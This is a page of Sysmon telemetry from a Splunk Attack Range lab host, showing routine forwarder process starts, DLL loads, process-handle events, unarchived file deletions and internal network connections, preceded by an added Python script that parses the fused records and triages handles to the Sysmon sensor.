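The records on this page arrive with every field run together and no delimiter, which makes them hard to search or count by hand. The Python below is an added example, not code from the Splunk Attack Range, Sysmon or the Splunk forwarder: it recovers the fields for the two record types on this page that a responder would actually triage, EventID 23 (File Delete archived) and EventID 10 (Process accessed), decodes the GrantedAccess mask into PROCESS_* rights, and flags two things these records show: deleted files that Sysmon could not archive (Archived="false - insufficient disk space", so no copy of the deleted file exists for later forensics) and cross-process handles opened to sysmon64.exe. The three sample records are copied from this page; the field order is taken from the Sysmon schema for those event types, the fused SourceProcessId/SourceThreadId is kept as one string because nothing in this form separates the two, and the access-right names come from winnt.h.

```python
"""Parse and triage Sysmon records in the delimiter-less form shown on this page.
Added example, not Splunk, Sysmon or Attack Range code. Layout inferred from the
page: EventID, Version, Level, Task, Opcode, Keywords and EventRecordID run
together, then Channel, Computer, a "-" placeholder, UtcTime and the event's own
fields. Sysmon sets Task equal to EventID, so a backreference splits the fused
leading digits without ambiguity."""
from __future__ import annotations
import re
from typing import Optional

_HEADER = re.compile(
    r"^(?P<event_id>\d+)(?P<version>\d)(?P<level>\d)(?P=event_id)(?P<opcode>\d)"
    r"(?P<keywords>0x80*)(?P<record_id>[1-9]\d*)"  # record IDs on the page never start with 0
    r"(?P<channel>Microsoft-Windows-Sysmon/Operational)(?P<computer>.+?)-"
    r"(?P<utc>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})(?P<body>.*)$", re.S)
_GUID = r"\{[0-9A-F-]+\}"
_EXE = r"[A-Za-z]:\\.+?\.exe"  # non-greedy: a path ends at its first ".exe"
_HASHES = (r"MD5=(?P<md5>[0-9A-F]+),SHA256=(?P<sha256>[0-9A-F]+),"
           r"IMPHASH=(?P<imphash>[0-9A-F]+)")
# EventID 23 (FileDelete): ProcessGuid, ProcessId, User, Image, TargetFilename,
# Hashes, IsExecutable, Archived.
_BODY_23 = re.compile(
    rf"^(?P<process_guid>{_GUID})(?P<pid>\d+)(?P<user>.+?)(?P<image>{_EXE})"
    rf"(?P<target>[A-Za-z]:\\.+?){_HASHES}(?P<is_executable>true|false)"
    r"(?P<archived>.*)$", re.S)
# EventID 10 (ProcessAccess): SourceProcessGuid, SourceProcessId+SourceThreadId
# (fused; nothing here separates them, so kept as one string), SourceImage,
# TargetProcessGuid, TargetProcessId, TargetImage, GrantedAccess, CallTrace.
_BODY_10 = re.compile(
    rf"^(?P<source_guid>{_GUID})(?P<source_pid_tid>\d+)(?P<source_image>{_EXE})"
    rf"(?P<target_guid>{_GUID})(?P<target_pid>\d+)(?P<target_image>{_EXE})"
    r"(?P<granted_access>0x[0-9a-f]+)(?P<call_trace>.*)$", re.S)
_BODIES = {23: _BODY_23, 10: _BODY_10}
# PROCESS_* access rights from winnt.h, enough to read a GrantedAccess mask.
_ACCESS_BITS = {
    0x0001: "TERMINATE", 0x0002: "CREATE_THREAD", 0x0008: "VM_OPERATION",
    0x0010: "VM_READ", 0x0020: "VM_WRITE", 0x0040: "DUP_HANDLE",
    0x0080: "CREATE_PROCESS", 0x0100: "SET_QUOTA", 0x0200: "SET_INFORMATION",
    0x0400: "QUERY_INFORMATION", 0x0800: "SUSPEND_RESUME",
    0x1000: "QUERY_LIMITED_INFORMATION"}
_INTRUSIVE = 0x0001 | 0x0002 | 0x0008 | 0x0020 | 0x0800  # kill, inject, suspend


def decode_access(mask: str) -> list[str]:
    """Names of the PROCESS_* rights set in a hex GrantedAccess mask."""
    value = int(mask, 16)
    return [name for bit, name in sorted(_ACCESS_BITS.items()) if value & bit]


def parse_record(line: str) -> Optional[dict]:
    """Split one fused record into fields; None if it is not such a record."""
    m = _HEADER.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["event_id"] = int(rec["event_id"])
    rec["record_id"] = int(rec["record_id"])
    body_re = _BODIES.get(rec["event_id"])
    if body_re is None:
        return rec  # event types not modelled keep their raw body
    bm = body_re.match(rec.pop("body"))
    if bm is None:
        return None
    rec.update(bm.groupdict())
    return rec


def triage(records: list[dict]) -> list[dict]:
    """Flag deletions Sysmon could not archive and handles opened to the sensor."""
    findings = []
    for r in records:
        if r["event_id"] == 23 and not r["archived"].startswith("true"):
            findings.append({"kind": "filedelete_not_archived", "record_id": r["record_id"],
                             "target": r["target"], "reason": r["archived"]})
        elif r["event_id"] == 10 and r["target_image"].lower().endswith("\\sysmon64.exe"):
            mask = int(r["granted_access"], 16)
            findings.append({"kind": "handle_to_sysmon", "record_id": r["record_id"],
                             "source_image": r["source_image"],
                             "rights": decode_access(r["granted_access"]),
                             "intrusive": bool(mask & _INTRUSIVE)})
    return findings


# Three records copied from this page, each as the single logical line it is.
SAMPLE_RECORDS = [
    r"23542300x800000000000000098492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:53.760"
    r"{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"
    r"C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational"
    r"MD5=267A9D9E82710AF43C352A951C1E7332,SHA256=06ECD2169AC8A60B2636C7A7CBBC9E84A8A6F49700D53583EA3EE4249EC4F947,"
    r"IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space",
    r"10341000x800000000000000098407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041"
    r"{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400"
    r"C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|"
    r"C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|"
    r"C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|"
    r"C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|"
    r"C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791",
    r"10341000x800000000000000098412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041"
    r"{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C07C-6294-2E0B-000000005502}5532"
    r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|"
    r"C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791",
]

if __name__ == "__main__":
    parsed = [r for r in map(parse_record, SAMPLE_RECORDS) if r is not None]
    for finding in triage(parsed):
        print(finding)
```

On this page's records the only handles to sysmon64.exe come from svchost.exe with GrantedAccess 0x1400 (QUERY_INFORMATION and QUERY_LIMITED_INFORMATION, via lsm.dll over RPC), which the triage reports as non-intrusive; a handle carrying VM_WRITE, CREATE_THREAD, TERMINATE or SUSPEND_RESUME to the sensor process would be the case to escalate. The 0x1fffff handle from conhost.exe to splunk-winprintmon.exe is not flagged because the target is not the sensor. Event 3 and Event 1 records are left with their raw body because their hostname and command-line fields carry digits and dashes that cannot be separated reliably in this form.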
Records below, in the order they appear (EventRecordID descending except where noted), all carry Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-ctus-attack-range-994.attackrange.local Keywords=0x8000000000000000 Level=4 Opcode=0 (EventID 7 and 10 records are schema Version=3; EventID 1, 3 and 23 are Version=5); every UtcTime is on 2022-05-30.

EventID=7 (Image loaded) records #98415 to #98408 all have ProcessGuid={326FD73D-C07C-6294-2E0B-000000005502} ProcessId=5532 Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe; EventID 10 record #98412 is listed where it falls:
#98415 UtcTime=13:02:52.041 ImageLoaded=C:\Windows\System32\gdi32.dll FileVersion="10.0.14393.4169 (rs1_release.210107-1130)" Description="GDI Client DLL" Product="Microsoft® Windows® Operating System" Company="Microsoft Corporation" OriginalFileName=gdi32 MD5=551D603CEC947F586DB9FADEF4D2EBA6 SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8 IMPHASH=A24D446CB7FCBB6D29B592603C0BE00C Signed=true Signature="Microsoft Windows" SignatureStatus=Valid
#98414 UtcTime=13:02:52.041 ImageLoaded=C:\Windows\System32\win32u.dll FileVersion="10.0.14393.0 (rs1_release.160715-1616)" Description="Win32u" Product="Microsoft® Windows® Operating System" Company="Microsoft Corporation" OriginalFileName=Win32u.DLL MD5=6A40F9C63B52CB4E8271CF3418618033 SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15 IMPHASH=00000000000000000000000000000000 Signed=true Signature="Microsoft Windows" SignatureStatus=Valid
#98413 UtcTime=13:02:52.041 ImageLoaded=C:\Windows\System32\user32.dll FileVersion="10.0.14393.4169 (rs1_release.210107-1130)" Description="Multi-User Windows USER API Client DLL" Product="Microsoft® Windows® Operating System" Company="Microsoft Corporation" OriginalFileName=user32 MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3 IMPHASH=070F257E4632BC576557C4085595EAA4 Signed=true Signature="Microsoft Windows" SignatureStatus=Valid
#98412 EventID=10 (Process accessed) UtcTime=13:02:52.041 SourceProcessGuid={326FD73D-A44C-6294-0901-000000005502} SourceProcessId=5372 SourceThreadId=5392 SourceImage=C:\Windows\system32\conhost.exe TargetProcessGuid={326FD73D-C07C-6294-2E0B-000000005502} TargetProcessId=5532 TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
#98411 UtcTime=13:02:52.041 ImageLoaded=C:\Windows\System32\KernelBase.dll FileVersion="10.0.14393.5125 (rs1_release.220429-1732)" Description="Windows NT BASE API Client DLL" Product="Microsoft® Windows® Operating System" Company="Microsoft Corporation" OriginalFileName=Kernelbase.dll MD5=D8F18C830B03B0D60C10093ECB020E60 SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F IMPHASH=05349EBAA635D77714868763D44881E9 Signed=true Signature="Microsoft Windows" SignatureStatus=Valid
#98410 UtcTime=13:02:52.041 ImageLoaded=C:\Windows\System32\kernel32.dll FileVersion="10.0.14393.5066 (rs1_release.220401-1841)" Description="Windows NT BASE API Client DLL" Product="Microsoft® Windows® Operating System" Company="Microsoft Corporation" OriginalFileName=kernel32 MD5=E258A076D1B87D41F724E431B3293BA5 SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E IMPHASH=3CE0779E0F4E275CD51A359A98CCC682 Signed=true Signature="Microsoft Windows" SignatureStatus=Valid
#98409 UtcTime=13:02:52.041 ImageLoaded=C:\Windows\System32\ntdll.dll FileVersion="10.0.14393.5006 (rs1_release.220301-1704)" Description="NT Layer DLL" Product="Microsoft® Windows® Operating System" Company="Microsoft Corporation" OriginalFileName=ntdll.dll MD5=F5EE39B17A8BCDEDC3D40997C26F62B1 SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952 IMPHASH=00000000000000000000000000000000 Signed=true Signature="Microsoft Windows" SignatureStatus=Valid
#98408 UtcTime=13:02:52.041 ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe FileVersion=8.2.5 Description="Windows Print Monitor" Product="splunk Application" Company="Splunk Inc." OriginalFileName=splunk-winprintmon.exe MD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97 SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE IMPHASH=35240A25EDE7EC5A65BF627E57E772B9 Signed=true Signature="Splunk, Inc." SignatureStatus=Valid

#98407 EventID=10 (Process accessed) UtcTime=13:02:52.041 SourceProcessGuid={326FD73D-A254-6294-0C00-000000005502} SourceProcessId=848 SourceThreadId=2056 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGuid={326FD73D-A262-6294-2700-000000005502} TargetProcessId=2872 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
#98406, #98405, #98404 EventID=10 UtcTime=13:02:52.041: same source, target, GrantedAccess and CallTrace as #98407 except the lsm.dll frame, which is lsm.dll+11aad, lsm.dll+11058 and lsm.dll+12023 respectively.
#98403 EventID=10 (Process accessed) UtcTime=13:02:52.041 SourceProcessGuid={326FD73D-A252-6294-0500-000000005502} SourceProcessId=416 SourceThreadId=432 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGuid={326FD73D-C07C-6294-2E0B-000000005502} TargetProcessId=5532 TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
#98402 EventID=10 (Process accessed) UtcTime=13:02:52.041 SourceProcessGuid={326FD73D-A44C-6294-0501-000000005502} SourceProcessId=5164 SourceThreadId=6008 SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe TargetProcessGuid={326FD73D-C07C-6294-2E0B-000000005502} TargetProcessId=5532 TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
#98401 EventID=1 (Process Create) UtcTime=13:02:52.042 ProcessGuid={326FD73D-C07C-6294-2E0B-000000005502} ProcessId=5532 Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe FileVersion=8.2.5 Description="Windows Print Monitor" Product="splunk Application" Company="Splunk Inc." OriginalFileName=splunk-winprintmon.exe CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe" CurrentDirectory=C:\Windows\system32\ User=NT AUTHORITY\SYSTEM LogonGuid={326FD73D-A253-6294-E703-000000000000} LogonId=0x3e7 TerminalSessionId=0 IntegrityLevel=System MD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97 SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE IMPHASH=35240A25EDE7EC5A65BF627E57E772B9 ParentProcessGuid={326FD73D-A44C-6294-0501-000000005502} ParentProcessId=5164 ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service

EventID=23 (File Delete archived) records below all have ProcessGuid={326FD73D-A45C-6294-5601-000000005502} ProcessId=6368 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived="false - insufficient disk space"; only UtcTime, MD5 and SHA256 differ. Two EventID=3 records (#98493, #98499) are listed where they fall:
#98492 UtcTime=13:02:53.760 MD5=267A9D9E82710AF43C352A951C1E7332 SHA256=06ECD2169AC8A60B2636C7A7CBBC9E84A8A6F49700D53583EA3EE4249EC4F947
#98494 UtcTime=13:02:54.853 MD5=59CE68AAA05274115B0AC1901874AC59 SHA256=21FCB6B0D428911374FF5F1CC6C128DDD052033A5EF511B8DB9C12D5C3B3D316
#98493 EventID=3 (Network connection detected) UtcTime=13:02:49.969 ProcessGuid={326FD73D-A455-6294-3701-000000005502} ProcessId=6180 Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe User=NT AUTHORITY\SYSTEM Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.14 SourceHostname=win-dc-ctus-attack-range-994.attackrange.local SourcePort=53307 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.12 DestinationHostname=- DestinationPort=8000 DestinationPortName=-
#98495 UtcTime=13:02:55.947 MD5=40B4B2E540B0AD09937C7C76AE4B02E6 SHA256=9FA5DE90EDBF5362CBEEC3D8BDBAA5E29FE89E40DED987F5006F941B9E73ACE8
#98496 UtcTime=13:02:57.041 MD5=BDB050D6EB305D8D78BCCDF3D8321B41 SHA256=758BA7FA3A4F8FA8B252627EA30266065B0431096BA56C899729DD8C8F35B96C
#98497 UtcTime=13:02:58.150 MD5=911452481ACBC265F42B3A0F33B59410 SHA256=9F9B88C1297A66212BCD7575BA1C5E3B72BB561A64046E9E40867FAA247C6DAE
#98498 UtcTime=13:02:59.244 MD5=18AECCA98368B6F8A46F21A33700A538 SHA256=ECA5396C71B64CA987C75F29666731FDF216547C19CF11893B13290F083B3F3A
#98500 UtcTime=13:03:00.338 MD5=E1E3776573736D15267F148AC71499A2 SHA256=BD1268437EE86E9EC819514E8B04DAC3E236462593D6AAE14729AD84C100BB0A
#98499 EventID=3 (Network connection detected) UtcTime=13:02:55.999 ProcessGuid={326FD73D-A455-6294-3701-000000005502} ProcessId=6180 Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe User=NT AUTHORITY\SYSTEM Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.14 SourceHostname=win-dc-ctus-attack-range-994.attackrange.local SourcePort=53308 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.12 DestinationHostname=- DestinationPort=8000 DestinationPortName=-
#98501 UtcTime=13:03:01.432 MD5=C6B5C79E4F0667CFF84FA520EB244328 SHA256=7AB886F8E2E90F1DB593289E8583AA05DBD937BA853D66ECB6372F0A39972BC6
#98502 UtcTime=13:03:02.525 MD5=F4503447AF5E92D8B333E000E235EA04 SHA256=7DD38058520C78D315D19BDBEB56AA9C72B234923D2126CF508198D3CAF926EE
#98503 EventID=23 (File Delete archived) UtcTime=13:03:03.619 ProcessGuid={326FD73D-A45C-6294-5601-000000005502} ProcessId=6368 User=NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=818460CC2B2B4DD6112CB520D7C27D68,SHA256=B0B761BB0769B4AF51C91C91C0A43A2F3E463EE0F32887F2B043FEE67D41F60C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:04.713{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71B7EF3037B895DBC96E9BB6D2326555,SHA256=BE0F8172093113BC8ECABE5F154B786CFD24935A4F05C874C739720E98DEBEFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:05.807{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1520945D70C6047AFC2A878ADBE3250,SHA256=EE34DAC434BA64B1F8A3D1B6AABAE42B6A3E7DE71BBF058886B40406AEA8C123,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:06.900{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27696179A1A2544BC62086FCCD6538FE,SHA256=D1F6D136C4C4ED7DBD4CB2BE0DED91F7B3C772F19544A895E8AA613D855B4166,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:02.015{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53309-false10.0.1.12-8000- 23542300x800000000000000098508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:07.994{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A287E5BD7AFE90CEB6B3C18F07B6B638,SHA256=C60F51DED32A015422A0AD4C0753F2C585FDE1D4EC52B0C02FD55B80DDBF5399,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:09.088{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26A63316876553BDEEAEA436D6DA5CCD,SHA256=3D342F1045FF151AB3A9DB8F31431FEDC3A6A1B620BAA61A6915631A9BBD3C7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:10.181{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CC3E1B2848812D01EBDF677ECFFB6C3,SHA256=FE49153DAC8A2FE681D3228AAD07D6A3AE5ACCBE89BFCDF02F3135C0951B8C28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:07.968{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53310-false10.0.1.12-8000- 23542300x800000000000000098511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:11.275{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75907C31B1EDFBB8CE079D1B21C03F2B,SHA256=B7CA18B531067BE051FC64C099078B9C37B024348BAA0B1B4C836501DD406D6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:12.369{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F761E9C99FCB3EECA99A3EF33AB66A4,SHA256=77D7C27F09679AAE44FF6FBFCD982F1190B1AA7A904B142F50AC541703A83085,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000098514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:13.463{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=540329D0E3B7C0B0EED98EAFCC3D9499,SHA256=C4FAF66EE93556EB46309BAC8678BD3E53EE0DB39B6904AA68B2E34E8E04D12F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:14.556{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F47EFE6E93AF2DC1968B4D371ACFD29,SHA256=2F08210459995FBB792CD107F6A3BA3D6A5B73C0B305BEEC8516430C643458BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:15.650{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D5188197D9F057913AB6B7835C6099F,SHA256=DBC7A2B15FF34567586417E92FFE510BF6F769E43273B80B49E82BA75350BDCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:16.744{326FD73D-A45C-6294-5601-000000005502}6368NT 